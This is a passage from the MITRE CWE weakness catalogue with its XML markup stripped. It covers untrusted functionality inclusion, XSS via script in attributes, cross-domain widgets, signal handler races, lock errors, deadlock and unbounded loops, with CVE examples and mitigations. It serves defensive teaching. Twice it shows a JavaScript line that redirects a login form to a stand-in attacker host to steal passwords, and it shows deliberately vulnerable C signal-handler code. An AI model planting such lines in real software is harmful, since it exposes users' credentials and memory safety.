Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere. + + When including third-party functionality, such as a web widget, library, or other source of functionality, the product must effectively trust that functionality. Without sufficient protection mechanisms, the functionality could be malicious in nature (either by coming from an untrusted source, being spoofed, or being modified in transit from a trusted source). The functionality might also contain its own weaknesses, or grant access to additional functionality and state information that should be kept private to the base system, such as system state information, sensitive application data, or the DOM of a web application. + This might lead to many different consequences depending on the included functionality, but some examples include injection of malware, information exposure by granting excessive privileges or permissions to the untrusted functionality, DOM-based XSS vulnerabilities, stealing user's cookies, or open redirect to malware (CWE-601). + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. + + + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + + + + SOAR Partial + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Forced Path Execution + Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Attack Modeling + + + + High + + + + + Architecture and Design + Libraries or Frameworks + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + + + Architecture and Design + Enforcement by Conversion + + When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. + For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability. + + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Architecture and Design + Operation + Sandbox or Jail + + Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. + OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + Limited + The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. + Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. + + High + + + Architecture and Design + Operation + Attack Surface Reduction + + Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately. + This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface. + + + + Architecture and Design + Implementation + Attack Surface Reduction + + Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. + Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components. + + + + Operation + Firewall + Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. + Moderate + An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. + + + + + This login webpage includes a weather widget from an external website: + + <div class="header"> Welcome!<div id="loginBox">Please Login:<form id ="loginForm" name="loginForm" action="login.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><input type="submit" value="Login" /></form></div><div id="WeatherWidget"><script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script></div></div> + + This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79). + For example, user login information could easily be stolen with a single line added to weatherwidget.js: + + + + ...Weather widget code.... + document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php"; + + This line of javascript changes the login form's original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site. + + + + + CVE-2010-2076 + Product does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service. + https://www.cve.org/CVERecord?id=CVE-2010-2076 + + + CVE-2004-0285 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2004-0285 + + + CVE-2004-0030 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2004-0030 + + + CVE-2004-0068 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2004-0068 + + + CVE-2005-2157 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2005-2157 + + + CVE-2005-2162 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2005-2162 + + + CVE-2005-2198 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2005-2198 + + + CVE-2004-0128 + Modification of assumed-immutable variable in configuration script leads to file inclusion. + https://www.cve.org/CVERecord?id=CVE-2004-0128 + + + CVE-2005-1864 + PHP file inclusion. + https://www.cve.org/CVERecord?id=CVE-2005-1864 + + + CVE-2005-1869 + PHP file inclusion. + https://www.cve.org/CVERecord?id=CVE-2005-1869 + + + CVE-2005-1870 + PHP file inclusion. + https://www.cve.org/CVERecord?id=CVE-2005-1870 + + + CVE-2005-2154 + PHP local file inclusion. + https://www.cve.org/CVERecord?id=CVE-2005-2154 + + + CVE-2002-1704 + PHP remote file include. + https://www.cve.org/CVERecord?id=CVE-2002-1704 + + + CVE-2002-1707 + PHP remote file include. + https://www.cve.org/CVERecord?id=CVE-2002-1707 + + + CVE-2005-1964 + PHP remote file include. + https://www.cve.org/CVERecord?id=CVE-2005-1964 + + + CVE-2005-1681 + PHP remote file include. + https://www.cve.org/CVERecord?id=CVE-2005-1681 + + + CVE-2005-2086 + PHP remote file include. + https://www.cve.org/CVERecord?id=CVE-2005-2086 + + + CVE-2004-0127 + Directory traversal vulnerability in PHP include statement. + https://www.cve.org/CVERecord?id=CVE-2004-0127 + + + CVE-2005-1971 + Directory traversal vulnerability in PHP include statement. + https://www.cve.org/CVERecord?id=CVE-2005-1971 + + + CVE-2005-3335 + PHP file inclusion issue, both remote and local; local include uses ".." and "%00" characters as a manipulation, but many remote file inclusion issues probably have this vector. + https://www.cve.org/CVERecord?id=CVE-2005-3335 + + + + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2010-11-29 + 1.11 + 2010-12-13 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not neutralize or incorrectly neutralizes "javascript:" or other URIs from dangerous attributes within tags, such as onmouseover, onload, onerror, or style. + + + + + + Primary + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Availability + Read Application Data + Execute Unauthorized Code or Commands + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. + + + Implementation + Output Encoding + + Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. + The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. + + + + Implementation + With Struts, write all data from form beans with the bean's filter attribute set to true. + + + Implementation + Attack Surface Reduction + To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. + Defense in Depth + + + + + CVE-2001-0520 + Bypass filtering of SCRIPT tags using onload in BODY, href in A, BUTTON, INPUT, and others. + https://www.cve.org/CVERecord?id=CVE-2001-0520 + + + CVE-2002-1493 + guestbook XSS in STYLE or IMG SRC attributes. + https://www.cve.org/CVERecord?id=CVE-2002-1493 + + + CVE-2002-1965 + Javascript in onerror attribute of IMG tag. + https://www.cve.org/CVERecord?id=CVE-2002-1965 + + + CVE-2002-1495 + XSS in web-based email product via onmouseover event. + https://www.cve.org/CVERecord?id=CVE-2002-1495 + + + CVE-2002-1681 + XSS via script in <P> tag. + https://www.cve.org/CVERecord?id=CVE-2002-1681 + + + CVE-2004-1935 + Onload, onmouseover, and other events in an e-mail attachment. + https://www.cve.org/CVERecord?id=CVE-2004-1935 + + + CVE-2005-0945 + Onmouseover and onload events in img, link, and mail tags. + https://www.cve.org/CVERecord?id=CVE-2005-0945 + + + CVE-2003-1136 + Javascript in onmouseover attribute in e-mail address or URL. + https://www.cve.org/CVERecord?id=CVE-2003-1136 + + + + + XSS using Script in Attributes + + + SFP24 + Tainted input to command + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + XSS using Script in Attributes + Failure to Sanitize Script in Attributes in a Web Page + + + + The product includes web functionality (such as a web widget) from another domain, which causes it to operate within the domain of the product, potentially granting total access and control of the product to the untrusted source. + + Including third party functionality in a web-based environment is risky, especially if the source of the functionality is untrusted. + Even if the third party is a trusted source, the product may still be exposed to attacks and malicious behavior if that trusted source is compromised, or if the code is modified in transmission from the third party to the product. + This weakness is common in "mashup" development on the web, which may include source functionality from other domains. For example, Javascript-based web widgets may be inserted by using '<SCRIPT SRC="http://other.domain.here">' tags, which causes the code to run in the domain of the product, not the remote site from which the widget was loaded. As a result, the included code has access to the local DOM, including cookies and other data that the developer might not want the remote site to be able to access. + Such dependencies may be desirable, or even required, but sometimes programmers are not aware that a dependency exists. + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + This login webpage includes a weather widget from an external website: + + <div class="header"> Welcome!<div id="loginBox">Please Login:<form id ="loginForm" name="loginForm" action="login.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><input type="submit" value="Login" /></form></div><div id="WeatherWidget"><script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script></div></div> + + This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79). + For example, user login information could easily be stolen with a single line added to weatherwidget.js: + + + + ...Weather widget code.... + document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php"; + + This line of javascript changes the login form's original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site. + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2010-12-08 + 1.11 + 2010-12-13 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product defines a function that is used as a handler for more than one signal. + + While sometimes intentional and safe, when the same function is used to handle multiple signals, a race condition could occur if the function uses any state outside of its local declaration, such as global variables or non-reentrant functions, or has any side effects. + An attacker could send one signal that invokes the handler function; in many OSes, this will typically prevent the same signal from invoking the handler again, at least until the handler function has completed execution. However, the attacker could then send a different signal that is associated with the same handler function. This could interrupt the original handler function while it is still executing. If there is shared state, then the state could be corrupted. This can lead to a variety of potential consequences depending on context, including denial of service and code execution. + Another rarely-explored possibility arises when the signal handler is only designed to be executed once (if at all). By sending multiple signals, an attacker could invoke the function more than once. This may generate extra, unintended side effects. A race condition might not even be necessary; the attacker could send one signal, wait until it is handled, then send the other signal. + + + + + + + Availability + Integrity + Confidentiality + Access Control + Other + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + Read Application Data + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Varies by Context + The most common consequence will be a corruption of the state of the product, possibly leading to a crash or exit. However, if the signal handler is operating on state variables for security relevant libraries or protection mechanisms, the consequences can be far more severe, including protection mechanism bypass, privilege escalation, or information exposure. + + + + + This code registers the same signal handler function with two different signals. + + void handler (int sigNum) {...} + int main (int argc, char* argv[]) {signal(SIGUSR1, handler)signal(SIGUSR2, handler)} + + + + This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits. + + char *logMessage; + void handler (int sigNum) { + syslog(LOG_NOTICE, "%s\n", logMessage);free(logMessage); + /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ + + sleep(10);exit(0); + } + int main (int argc, char* argv[]) { + logMessage = strdup(argv[1]); + /* Register signal handlers. */ + + signal(SIGHUP, handler);signal(SIGTERM, handler); + /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ + + sleep(10); + } + + The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines: + + + + The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM. + + + The program begins its "normal" functionality, which is simplified as sleep(), but could be any functionality that consumes some time. + + + The attacker sends SIGHUP, which invokes handler (call this "SIGHUP-handler"). + + + SIGHUP-handler begins to execute, calling syslog(). + + + syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap. + + + The attacker then sends SIGTERM. + + + SIGHUP-handler is interrupted, but syslog's malloc call is still executing and has not finished modifying its metadata. + + + The SIGTERM handler is invoked. + + + SIGTERM-handler records the log message using syslog(), then frees the logMessage variable. + + + + At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running. + Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution. + Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array. + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2010-12-12 + 1.11 + 2010-12-13 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product attempts to unlock a resource that is not locked. + Depending on the locking functionality, an unlock of a non-locked resource might cause memory corruption or other modification to the resource (or its associated metadata that is used for tracking locks). + + + + + + Integrity + Confidentiality + Availability + Other + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + Modify Memory + Other + Depending on the locking being used, an unlock operation might not have any adverse effects. When effects exist, the most common consequence will be a corruption of the state of the product, possibly leading to a crash or exit; depending on the implementation of the unlocking, memory corruption or code execution could occur. + + + + + CVE-2010-4210 + function in OS kernel unlocks a mutex that was not previously locked, causing a panic or overwrite of arbitrary memory. + https://www.cve.org/CVERecord?id=CVE-2010-4210 + + + CVE-2008-4302 + Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash. + https://www.cve.org/CVERecord?id=CVE-2008-4302 + + + CVE-2009-1243 + OS kernel performs an unlock in some incorrect circumstances, leading to panic. + https://www.cve.org/CVERecord?id=CVE-2009-1243 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2010-12-12 + 1.11 + 2010-12-13 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains multiple threads or executable segments that are waiting for each other to release a necessary lock, resulting in deadlock. + + + + + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Other) + DoS: Crash, Exit, or Restart + Each thread of execution will "hang" and prevent tasks from completing. In some cases, CPU consumption may occur if a lock check occurs in a tight loop. + + + + + CVE-1999-1476 + A bug in some Intel Pentium processors allow DoS (hang) via an invalid "CMPXCHG8B" instruction, causing a deadlock + https://www.cve.org/CVERecord?id=CVE-1999-1476 + + + CVE-2009-2857 + OS deadlock + https://www.cve.org/CVERecord?id=CVE-2009-2857 + + + CVE-2009-1961 + OS deadlock involving 3 separate functions + https://www.cve.org/CVERecord?id=CVE-2009-1961 + + + CVE-2009-2699 + deadlock in library + https://www.cve.org/CVERecord?id=CVE-2009-2699 + + + CVE-2009-4272 + deadlock triggered by packets that force collisions in a routing table + https://www.cve.org/CVERecord?id=CVE-2009-4272 + + + CVE-2002-1850 + read/write deadlock between web server and script + https://www.cve.org/CVERecord?id=CVE-2002-1850 + + + CVE-2004-0174 + web server deadlock involving multiple listening connections + https://www.cve.org/CVERecord?id=CVE-2004-0174 + + + CVE-2009-1388 + multiple simultaneous calls to the same function trigger deadlock. + https://www.cve.org/CVERecord?id=CVE-2009-1388 + + + CVE-2006-5158 + chain: other weakness leads to NULL pointer dereference (CWE-476) or deadlock (CWE-833). + https://www.cve.org/CVERecord?id=CVE-2006-5158 + + + CVE-2006-4342 + deadlock when an operation is performed on a resource while it is being removed. + https://www.cve.org/CVERecord?id=CVE-2006-4342 + + + CVE-2006-2374 + Deadlock in device driver triggered by using file handle of a related device. + https://www.cve.org/CVERecord?id=CVE-2006-2374 + + + CVE-2006-2275 + Deadlock when large number of small messages cannot be processed quickly enough. + https://www.cve.org/CVERecord?id=CVE-2006-2275 + + + CVE-2005-3847 + OS kernel has deadlock triggered by a signal during a core dump. + https://www.cve.org/CVERecord?id=CVE-2005-3847 + + + CVE-2005-3106 + Race condition leads to deadlock. + https://www.cve.org/CVERecord?id=CVE-2005-3106 + + + CVE-2005-2456 + Chain: array index error (CWE-129) leads to deadlock (CWE-833) + https://www.cve.org/CVERecord?id=CVE-2005-2456 + + + + + LCK08-J + Ensure actively held locks are released on exceptional conditions + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2010-12-12 + 1.11 + 2010-12-13 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs an iteration or loop without sufficiently limiting the number of times that the loop is executed. + If the iteration can be influenced by an attacker, this weakness could allow attackers to consume excessive resources such as CPU or memory. In many cases, a loop does not need to be infinite in order to cause enough resource consumption to adversely affect the product or its host system; it depends on the amount of resources consumed per iteration. + + + + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Amplification + DoS: Crash, Exit, or Restart + Excessive looping will cause unexpected consumption of resources, such as CPU cycles or memory. The product's operation may slow down, or cause a long time to respond. If limited resources such as memory are consumed for each iteration, the loop may eventually cause a crash or program exit due to exhaustion of resources, such as an out-of-memory error. + + + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + Forced Path Execution + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Context-configured Source Code Weakness Analyzer + 